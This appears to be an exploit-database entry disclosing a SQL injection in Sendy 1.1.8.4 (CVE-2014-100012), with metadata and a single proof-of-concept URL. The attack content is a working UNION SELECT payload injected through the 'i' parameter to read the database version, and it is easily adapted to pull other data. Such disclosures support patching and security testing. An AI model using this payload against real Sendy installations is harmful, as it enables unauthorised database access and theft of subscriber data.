EXPLOITS

Sendy 1.1.8.4 - SQL Injection

Author: Hurley
type: webapps
platform: php
port: 80.0
date_added: 2014-02-25  
date_updated: 2014-02-25  
verified: 1  
codes: OSVDB-103713;CVE-2014-100012  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31898.txt  

# Exploit Title: Sendy SqlInject
# Date: 2014-02-24
# Exploit Author: Hurley
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.8.4

Demo page:
http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--